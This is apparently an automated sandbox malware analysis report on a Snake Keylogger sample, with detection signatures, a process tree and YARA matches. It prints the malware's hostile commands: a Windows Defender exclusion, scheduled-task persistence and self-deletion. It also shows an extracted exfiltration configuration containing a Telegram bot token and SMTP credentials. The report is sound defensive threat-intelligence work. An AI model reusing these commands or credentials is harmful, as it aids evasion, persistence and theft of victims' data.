Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1583473
MD5:	7dff0dedcceb56002189a9ce88cf2236
SHA1:	7323fe3ec4b682f5d84d353fdec3e66d98e2fefa
SHA256:	3cd162fe9f394907e7dae6c4f342f7859d4ea2d645b24a098cd2cb5a877306f8
Tags:	NETexeMSILSnakeKeyloggeruser-jstrosch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7DFF0DEDCCEB56002189A9CE88CF2236)

powershell.exe (PID: 6036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2084 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5544 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 2120 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cmd.exe (PID: 7496 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7544 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

NPadpxkCGKGoat.exe (PID: 7236 cmdline: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe MD5: 7DFF0DEDCCEB56002189A9CE88CF2236)

schtasks.exe (PID: 7328 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmpAE14.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cmd.exe (PID: 7688 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7740 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8095376190:AAGkuX6q297ioTZKrXInGOZiyZCFoUcQAQI/sendMessage?chat_id=1969833297", "Username": "oanhnth@dap.vn", "Password": "KhAnh110886", "Host": "mail.dap.vn", "Port": "587", "Token": "8095376190:AAGkuX6q297ioTZKrXInGOZiyZCFoUcQAQI", "Chat_id": "1969833297", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1493e:$a1: get_encryptedPassword 0x14c2a:$a2: get_encryptedUsername 0x1474a:$a3: get_timePasswordChanged 0x14845:$a4: get_passwordField 0x14954:$a5: set_encryptedPassword 0x15fc2:$a7: get_logins 0x15f25:$a10: KeyLoggerEventArgs 0x15b90:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a54:$x1: $%SMTPDV$ 0x18358:$x2: $#TheHashHere%& 0x199fc:$x3: %FTPDV$ 0x182f8:$x4: $%TelegramDv$ 0x15b90:$x5: KeyLoggerEventArgs 0x15f25:$x5: KeyLoggerEventArgs 0x19a20:$m2: Clipboard Logs ID 0x19c54:$m2: Screenshot Logs ID 0x19d64:$m2: keystroke Logs ID 0x1a03e:$m3: SnakePW 0x19c2c:$m4: \SnakeKeylogger\
0000000B.00000002.1875749509.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x28515e:$a1: get_encryptedPassword 0x2a5d7e:$a1: get_encryptedPassword 0x2c679e:$a1: get_encryptedPassword 0x28544a:$a2: get_encryptedUsername 0x2a606a:$a2: get_encryptedUsername 0x2c6a8a:$a2: get_encryptedUsername 0x284f6a:$a3: get_timePasswordChanged 0x2a5b8a:$a3: get_timePasswordChanged 0x2c65aa:$a3: get_timePasswordChanged 0x285065:$a4: get_passwordField 0x2a5c85:$a4: get_passwordField 0x2c66a5:$a4: get_passwordField 0x285174:$a5: set_encryptedPassword 0x2a5d94:$a5: set_encryptedPassword 0x2c67b4:$a5: set_encryptedPassword 0x2867e2:$a7: get_logins 0x2a7402:$a7: get_logins 0x2c7e22:$a7: get_logins 0x286745:$a10: KeyLoggerEventArgs 0x2a7365:$a10: KeyLoggerEventArgs 0x2c7d85:$a10: KeyLoggerEventArgs
00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28a274:$x1: $%SMTPDV$ 0x2aae94:$x1: $%SMTPDV$ 0x2cb8b4:$x1: $%SMTPDV$ 0x288b78:$x2: $#TheHashHere%& 0x2a9798:$x2: $#TheHashHere%& 0x2ca1b8:$x2: $#TheHashHere%& 0x28a21c:$x3: %FTPDV$ 0x2aae3c:$x3: %FTPDV$ 0x2cb85c:$x3: %FTPDV$ 0x288b18:$x4: $%TelegramDv$ 0x2a9738:$x4: $%TelegramDv$ 0x2ca158:$x4: $%TelegramDv$ 0x2863b0:$x5: KeyLoggerEventArgs 0x286745:$x5: KeyLoggerEventArgs 0x2a6fd0:$x5: KeyLoggerEventArgs 0x2a7365:$x5: KeyLoggerEventArgs 0x2c79f0:$x5: KeyLoggerEventArgs 0x2c7d85:$x5: KeyLoggerEventArgs 0x28a240:$m2: Clipboard Logs ID 0x28a474:$m2: Screenshot Logs ID 0x28a584:$m2: keystroke Logs ID
00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x19bf6:$a1: get_encryptedPassword 0x3a616:$a1: get_encryptedPassword 0xc1226:$a1: get_encryptedPassword 0x19ee2:$a2: get_encryptedUsername 0x3a902:$a2: get_encryptedUsername 0xc1512:$a2: get_encryptedUsername 0x19a02:$a3: get_timePasswordChanged 0x3a422:$a3: get_timePasswordChanged 0xc1032:$a3: get_timePasswordChanged 0x19afd:$a4: get_passwordField 0x3a51d:$a4: get_passwordField 0xc112d:$a4: get_passwordField 0x19c0c:$a5: set_encryptedPassword 0x3a62c:$a5: set_encryptedPassword 0xc123c:$a5: set_encryptedPassword 0x1b27a:$a7: get_logins 0x3bc9a:$a7: get_logins 0xc28aa:$a7: get_logins 0x1b1dd:$a10: KeyLoggerEventArgs 0x3bbfd:$a10: KeyLoggerEventArgs 0xc280d:$a10: KeyLoggerEventArgs
00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1ed0c:$x1: $%SMTPDV$ 0x3f72c:$x1: $%SMTPDV$ 0xc633c:$x1: $%SMTPDV$ 0x1d610:$x2: $#TheHashHere%& 0x3e030:$x2: $#TheHashHere%& 0xc4c40:$x2: $#TheHashHere%& 0x1ecb4:$x3: %FTPDV$ 0x3f6d4:$x3: %FTPDV$ 0xc62e4:$x3: %FTPDV$ 0x1d5b0:$x4: $%TelegramDv$ 0x3dfd0:$x4: $%TelegramDv$ 0xc4be0:$x4: $%TelegramDv$ 0x1ae48:$x5: KeyLoggerEventArgs 0x1b1dd:$x5: KeyLoggerEventArgs 0x3b868:$x5: KeyLoggerEventArgs 0x3bbfd:$x5: KeyLoggerEventArgs 0xc2478:$x5: KeyLoggerEventArgs 0xc280d:$x5: KeyLoggerEventArgs 0x1ecd8:$m2: Clipboard Logs ID 0x1ef0c:$m2: Screenshot Logs ID 0x1f01c:$m2: keystroke Logs ID
00000006.00000002.1824025899.0000000003181000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: file.exe PID: 6784	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6784	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 6784	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: file.exe PID: 6784	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7341d:$a1: get_encryptedPassword 0x73612:$a2: get_encryptedUsername 0x73246:$a3: get_timePasswordChanged 0x73335:$a4: get_passwordField 0x73433:$a5: set_encryptedPassword 0x75389:$a7: get_logins 0x75301:$a10: KeyLoggerEventArgs 0x7508c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: file.exe PID: 6784	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x7508c:$x5: KeyLoggerEventArgs 0x75301:$x5: KeyLoggerEventArgs 0x75b26:$x5: KeyLoggerEventArgs 0x75e87:$x5: KeyLoggerEventArgs 0x7746f:$m2: Clipboard Logs ID 0x77570:$m2: Screenshot Logs ID 0x775c6:$m2: keystroke Logs ID 0x776fb:$m3: SnakePW 0x7755c:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 2120	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 2120	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 2120	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x17981:$a1: get_encryptedPassword 0x17c63:$a2: get_encryptedUsername 0x17797:$a3: get_timePasswordChanged 0x17892:$a4: get_passwordField 0x17997:$a5: set_encryptedPassword 0x19e6d:$a7: get_logins 0x19dd0:$a10: KeyLoggerEventArgs 0x19a3b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 2120	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a3b:$x5: KeyLoggerEventArgs 0x19dd0:$x5: KeyLoggerEventArgs 0x1a6d7:$x5: KeyLoggerEventArgs 0x1aa38:$x5: KeyLoggerEventArgs 0x1c06f:$m2: Clipboard Logs ID 0x1c170:$m2: Screenshot Logs ID 0x1c1c6:$m2: keystroke Logs ID 0x1c2fb:$m3: SnakePW 0x1c15c:$m4: \SnakeKeylogger\
Process Memory Space: NPadpxkCGKGoat.exe PID: 7236	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: NPadpxkCGKGoat.exe PID: 7236	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: NPadpxkCGKGoat.exe PID: 7236	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: NPadpxkCGKGoat.exe PID: 7236	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6109d:$a1: get_encryptedPassword 0x6137f:$a2: get_encryptedUsername 0x60eb3:$a3: get_timePasswordChanged 0x60fae:$a4: get_passwordField 0x610b3:$a5: set_encryptedPassword 0x63589:$a7: get_logins 0x634ec:$a10: KeyLoggerEventArgs 0x63157:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: NPadpxkCGKGoat.exe PID: 7236	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x63157:$x5: KeyLoggerEventArgs 0x634ec:$x5: KeyLoggerEventArgs 0x63df3:$x5: KeyLoggerEventArgs 0x64154:$x5: KeyLoggerEventArgs 0x6578b:$m2: Clipboard Logs ID 0x6588c:$m2: Screenshot Logs ID 0x658e2:$m2: keystroke Logs ID 0x65a17:$m3: SnakePW 0x65878:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 7380	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12d3e:$a1: get_encryptedPassword 0x1302a:$a2: get_encryptedUsername 0x12b4a:$a3: get_timePasswordChanged 0x12c45:$a4: get_passwordField 0x12d54:$a5: set_encryptedPassword 0x143c2:$a7: get_logins 0x14325:$a10: KeyLoggerEventArgs 0x13f90:$a11: KeyLoggerEventArgsEventHandler
8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a812:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19a44:$a3: \Google\Chrome\User Data\Default\Login Data 0x19e77:$a4: \Orbitum\User Data\Default\Login Data 0x1aeb6:$a5: \Kometa\User Data\Default\Login Data
8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13917:$s1: UnHook 0x1391e:$s2: SetHook 0x13926:$s3: CallNextHook 0x13933:$s4: _hook
8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17e54:$x1: $%SMTPDV$ 0x16758:$x2: $#TheHashHere%& 0x17dfc:$x3: %FTPDV$ 0x166f8:$x4: $%TelegramDv$ 0x13f90:$x5: KeyLoggerEventArgs 0x14325:$x5: KeyLoggerEventArgs 0x17e20:$m2: Clipboard Logs ID 0x18054:$m2: Screenshot Logs ID 0x18164:$m2: keystroke Logs ID 0x1843e:$m3: SnakePW 0x1802c:$m4: \SnakeKeylogger\
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b3e:$a1: get_encryptedPassword 0x14e2a:$a2: get_encryptedUsername 0x1494a:$a3: get_timePasswordChanged 0x14a45:$a4: get_passwordField 0x14b54:$a5: set_encryptedPassword 0x161c2:$a7: get_logins 0x16125:$a10: KeyLoggerEventArgs 0x15d90:$a11: KeyLoggerEventArgsEventHandler
6.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c612:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b844:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bc77:$a4: \Orbitum\User Data\Default\Login Data 0x1ccb6:$a5: \Kometa\User Data\Default\Login Data
6.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15717:$s1: UnHook 0x1571e:$s2: SetHook 0x15726:$s3: CallNextHook 0x15733:$s4: _hook
6.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19c54:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x19bfc:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x15d90:$x5: KeyLoggerEventArgs 0x16125:$x5: KeyLoggerEventArgs 0x19c20:$m2: Clipboard Logs ID 0x19e54:$m2: Screenshot Logs ID 0x19f64:$m2: keystroke Logs ID 0x1a23e:$m3: SnakePW 0x19e2c:$m4: \SnakeKeylogger\
0.2.file.exe.4771620.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.4771620.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.file.exe.4771620.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12d3e:$a1: get_encryptedPassword 0x1302a:$a2: get_encryptedUsername 0x12b4a:$a3: get_timePasswordChanged 0x12c45:$a4: get_passwordField 0x12d54:$a5: set_encryptedPassword 0x143c2:$a7: get_logins 0x14325:$a10: KeyLoggerEventArgs 0x13f90:$a11: KeyLoggerEventArgsEventHandler
0.2.file.exe.4771620.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a812:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19a44:$a3: \Google\Chrome\User Data\Default\Login Data 0x19e77:$a4: \Orbitum\User Data\Default\Login Data 0x1aeb6:$a5: \Kometa\User Data\Default\Login Data
0.2.file.exe.4771620.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13917:$s1: UnHook 0x1391e:$s2: SetHook 0x13926:$s3: CallNextHook 0x13933:$s4: _hook
0.2.file.exe.4771620.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17e54:$x1: $%SMTPDV$ 0x16758:$x2: $#TheHashHere%& 0x17dfc:$x3: %FTPDV$ 0x166f8:$x4: $%TelegramDv$ 0x13f90:$x5: KeyLoggerEventArgs 0x14325:$x5: KeyLoggerEventArgs 0x17e20:$m2: Clipboard Logs ID 0x18054:$m2: Screenshot Logs ID 0x18164:$m2: keystroke Logs ID 0x1843e:$m3: SnakePW 0x1802c:$m4: \SnakeKeylogger\
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.file.exe.4771620.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.4771620.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12d3e:$a1: get_encryptedPassword 0x1302a:$a2: get_encryptedUsername 0x12b4a:$a3: get_timePasswordChanged 0x12c45:$a4: get_passwordField 0x12d54:$a5: set_encryptedPassword 0x143c2:$a7: get_logins 0x14325:$a10: KeyLoggerEventArgs 0x13f90:$a11: KeyLoggerEventArgsEventHandler
0.2.file.exe.4771620.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a812:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19a44:$a3: \Google\Chrome\User Data\Default\Login Data 0x19e77:$a4: \Orbitum\User Data\Default\Login Data 0x1aeb6:$a5: \Kometa\User Data\Default\Login Data
0.2.file.exe.4771620.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b3e:$a1: get_encryptedPassword 0x3575e:$a1: get_encryptedPassword 0x5617e:$a1: get_encryptedPassword 0x14e2a:$a2: get_encryptedUsername 0x35a4a:$a2: get_encryptedUsername 0x5646a:$a2: get_encryptedUsername 0x1494a:$a3: get_timePasswordChanged 0x3556a:$a3: get_timePasswordChanged 0x55f8a:$a3: get_timePasswordChanged 0x14a45:$a4: get_passwordField 0x35665:$a4: get_passwordField 0x56085:$a4: get_passwordField 0x14b54:$a5: set_encryptedPassword 0x35774:$a5: set_encryptedPassword 0x56194:$a5: set_encryptedPassword 0x161c2:$a7: get_logins 0x36de2:$a7: get_logins 0x57802:$a7: get_logins 0x16125:$a10: KeyLoggerEventArgs 0x36d45:$a10: KeyLoggerEventArgs 0x57765:$a10: KeyLoggerEventArgs
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13917:$s1: UnHook 0x1391e:$s2: SetHook 0x13926:$s3: CallNextHook 0x13933:$s4: _hook
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17e54:$x1: $%SMTPDV$ 0x16758:$x2: $#TheHashHere%& 0x17dfc:$x3: %FTPDV$ 0x166f8:$x4: $%TelegramDv$ 0x13f90:$x5: KeyLoggerEventArgs 0x14325:$x5: KeyLoggerEventArgs 0x17e20:$m2: Clipboard Logs ID 0x18054:$m2: Screenshot Logs ID 0x18164:$m2: keystroke Logs ID 0x1843e:$m3: SnakePW 0x1802c:$m4: \SnakeKeylogger\
0.2.file.exe.4771620.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c612:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d232:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5dc52:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b844:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c464:$a3: \Google\Chrome\User Data\Default\Login Data 0x5ce84:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bc77:$a4: \Orbitum\User Data\Default\Login Data 0x3c897:$a4: \Orbitum\User Data\Default\Login Data 0x5d2b7:$a4: \Orbitum\User Data\Default\Login Data 0x1ccb6:$a5: \Kometa\User Data\Default\Login Data 0x3d8d6:$a5: \Kometa\User Data\Default\Login Data 0x5e2f6:$a5: \Kometa\User Data\Default\Login Data
0.2.file.exe.4771620.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15717:$s1: UnHook 0x36337:$s1: UnHook 0x56d57:$s1: UnHook 0x1571e:$s2: SetHook 0x3633e:$s2: SetHook 0x56d5e:$s2: SetHook 0x15726:$s3: CallNextHook 0x36346:$s3: CallNextHook 0x56d66:$s3: CallNextHook 0x15733:$s4: _hook 0x36353:$s4: _hook 0x56d73:$s4: _hook
0.2.file.exe.4771620.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19c54:$x1: $%SMTPDV$ 0x3a874:$x1: $%SMTPDV$ 0x5b294:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x39178:$x2: $#TheHashHere%& 0x59b98:$x2: $#TheHashHere%& 0x19bfc:$x3: %FTPDV$ 0x3a81c:$x3: %FTPDV$ 0x5b23c:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x39118:$x4: $%TelegramDv$ 0x59b38:$x4: $%TelegramDv$ 0x15d90:$x5: KeyLoggerEventArgs 0x16125:$x5: KeyLoggerEventArgs 0x369b0:$x5: KeyLoggerEventArgs 0x36d45:$x5: KeyLoggerEventArgs 0x573d0:$x5: KeyLoggerEventArgs 0x57765:$x5: KeyLoggerEventArgs 0x19c20:$m2: Clipboard Logs ID 0x19e54:$m2: Screenshot Logs ID 0x19f64:$m2: keystroke Logs ID
0.2.file.exe.46a75e0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.46a75e0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.file.exe.46a75e0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
